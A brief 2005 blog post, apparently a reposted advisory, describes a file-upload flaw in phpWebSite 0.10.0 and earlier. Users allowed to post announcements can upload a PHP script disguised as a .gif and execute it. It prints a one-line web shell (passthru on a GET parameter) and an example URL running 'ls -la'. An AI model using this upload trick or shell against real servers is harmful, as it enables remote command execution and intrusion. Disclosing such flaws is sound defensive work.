Sunday, March 06, 2005

 

PHP include in phpWebSite

PHP include in phpWebSite

Summary:

Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.

Example:

http://[target]/images/announce/[anyname].gif.php?nst=ls –la

Where [anyname].gif.php - php-script with this line:

passthru($_GET[nst]);

Vulnerable Systems:

phpWebSite <= 0.10.0

Official Website: phpWebSite

# posted by WebFanatic @ 3:19 AM
Comments: Post a Comment



<< Home

This page is powered by Blogger. Isn't yours?